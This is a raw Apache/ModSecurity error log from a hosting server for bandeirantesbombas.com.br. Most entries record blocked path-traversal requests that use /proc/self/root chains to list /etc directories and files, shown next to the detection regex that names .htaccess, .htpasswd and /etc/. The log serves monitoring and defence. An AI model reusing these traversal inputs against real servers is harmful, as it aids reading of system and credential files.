[Fri Mar 20 10:33:22.180258 2026] [:error] [pid 7235:tid 140411716749056] [client 74.7.241.31:36020] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1MofqxLDW4GITHUkQJwAAAAQM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 10:33:23.566989 2026] [access_compat:error] [pid 7893:tid 140411725141760] [client 193.26.115.140:15508] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Fri Mar 20 10:33:23.731288 2026] [:error] [pid 7893:tid 140411649607424] [client 57.141.18.41:48184] [client 57.141.18.41] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/networkmanager"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1MoxCii7xarUs8iHaKXgAAAgs"]
[Fri Mar 20 10:33:24.689647 2026] [:error] [pid 11167:tid 140411658000128] [client 74.7.241.31:36030] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1MpPHIg5MgXLBnicMWDQAAAco"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 10:33:27.381391 2026] [access_compat:error] [pid 31215:tid 140411548894976] [client 45.80.158.249:42924] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Fri Mar 20 10:33:28.893834 2026] [:error] [pid 26799:tid 140411540502272] [client 57.141.18.40:48310] [client 57.141.18.40] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/system-release-cpe"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1MqNa6ubjKNq_cu4b5vQAAA1g"]
[Fri Mar 20 10:33:29.335265 2026] [:error] [pid 31215:tid 140411649607424] [client 57.141.18.67:48244] [client 57.141.18.67] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/logrotate.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1MqQF0L0L-SsrnPo6JUwAAAss"]
[Fri Mar 20 10:33:30.850785 2026] [access_compat:error] [pid 10189:tid 140411741927168] [client 45.138.16.107:17032] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Fri Mar 20 10:33:40.557651 2026] [:error] [pid 31215:tid 140411708356352] [client 57.141.18.81:48702] [client 57.141.18.81] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/geoip.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1MtAF0L0L-SsrnPo6JYgAAAsQ"]
[Fri Mar 20 10:33:43.751809 2026] [:error] [pid 31215:tid 140411632822016] [client 74.7.241.31:36034] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1MtwF0L0L-SsrnPo6JZQAAAs0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 10:33:45.077515 2026] [:error] [pid 31215:tid 140411540502272] [client 74.7.241.31:33114] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1MuQF0L0L-SsrnPo6JZgAAAtg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 10:33:49.555370 2026] [:error] [pid 11642:tid 140411616036608] [client 74.7.241.31:33118] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1Mvbninkcc-iUj5Ap9rAAAA48"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 10:33:50.868270 2026] [:error] [pid 10189:tid 140411557287680] [client 74.7.241.31:48580] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1MvjJ3M9BSuKP7CAZC0QAAAJY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 10:33:51.910724 2026] [access_compat:error] [pid 10189:tid 140411540502272] [client 51.210.111.26:32797] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Fri Mar 20 10:33:55.537537 2026] [:error] [pid 10189:tid 140411599251200] [client 74.7.241.31:48592] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1MwzJ3M9BSuKP7CAZC2wAAAJE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 10:33:56.056717 2026] [:error] [pid 9818:tid 140411565680384] [client 57.141.18.112:49166] [client 57.141.18.112] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1MxF1pVZ5mVmJwsFNPugAAAFU"]
[Fri Mar 20 10:34:01.594986 2026] [:error] [pid 7893:tid 140411565680384] [client 57.141.18.2:49408] [client 57.141.18.2] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1MyBCii7xarUs8iHaKlwAAAhU"]
[Fri Mar 20 10:34:01.594989 2026] [:error] [pid 31215:tid 140411658000128] [client 74.7.241.31:48594] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1MyQF0L0L-SsrnPo6JdQAAAso"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 10:34:04.203488 2026] [:error] [pid 9818:tid 140411624429312] [client 74.7.241.31:45636] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1MzF1pVZ5mVmJwsFNPvwAAAE4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 10:34:05.514876 2026] [:error] [pid 15826:tid 140411691570944] [client 74.7.241.31:45646] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1MzeoXxyEfFpUF8f-ggAAAAUY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 10:34:09.113478 2026] [:error] [pid 11642:tid 140411574073088] [client 57.141.18.15:49492] [client 57.141.18.15] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/redhat-release"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1M0Lninkcc-iUj5Ap9yAAAA5Q"]
[Fri Mar 20 10:34:09.114902 2026] [:error] [pid 10189:tid 140411699963648] [client 74.7.241.31:45660] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1MzzJ3M9BSuKP7CAZC8gAAAIU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 10:34:09.116656 2026] [:error] [pid 10189:tid 140411590858496] [client 57.141.18.76:49566] [client 57.141.18.76] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1M0DJ3M9BSuKP7CAZC9gAAAJI"]
[Fri Mar 20 10:34:12.738270 2026] [:error] [pid 11167:tid 140411565680384] [client 74.7.228.61:51908] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "ab1M1PHIg5MgXLBnicMWMQAAAdU"]
[Fri Mar 20 10:34:29.707357 2026] [:error] [pid 7893:tid 140411565680384] [client 57.141.18.122:50362] [client 57.141.18.122] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1M5RCii7xarUs8iHaKwAAAAhU"]
[Fri Mar 20 10:34:29.979429 2026] [:error] [pid 21219:tid 140411733534464] [client 57.141.18.80:50416] [client 57.141.18.80] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/.pwd.lock"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1M5fXLqtnMIWvjpaK7GQAAAoE"]
[Fri Mar 20 10:34:31.929149 2026] [mime_magic:error] [pid 21219:tid 140411548894976] (70014)End of file found: [client 216.73.216.191:8849] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 10:34:33.213903 2026] [mime_magic:error] [pid 9818:tid 140411733534464] (70014)End of file found: [client 216.73.216.191:61671] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 10:34:39.337969 2026] [:error] [pid 9818:tid 140411741927168] [client 57.141.18.15:50870] [client 57.141.18.15] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/libaudit.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1M711pVZ5mVmJwsFNP0QAAAEA"]
[Fri Mar 20 10:34:43.918559 2026] [:error] [pid 11642:tid 140411725141760] [client 57.141.18.107:51004] [client 57.141.18.107] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1M87ninkcc-iUj5Ap94gAAA4I"]
[Fri Mar 20 10:34:47.679065 2026] [:error] [pid 7893:tid 140411741927168] [client 57.141.18.79:51126] [client 57.141.18.79] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/printcap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1M9xCii7xarUs8iHaK1AAAAgA"]
[Fri Mar 20 10:34:55.362654 2026] [:error] [pid 7235:tid 140411733534464] [client 57.141.18.32:51450] [client 57.141.18.32] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/dbus-1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1M__qxLDW4GITHUkQKIwAAAQE"]
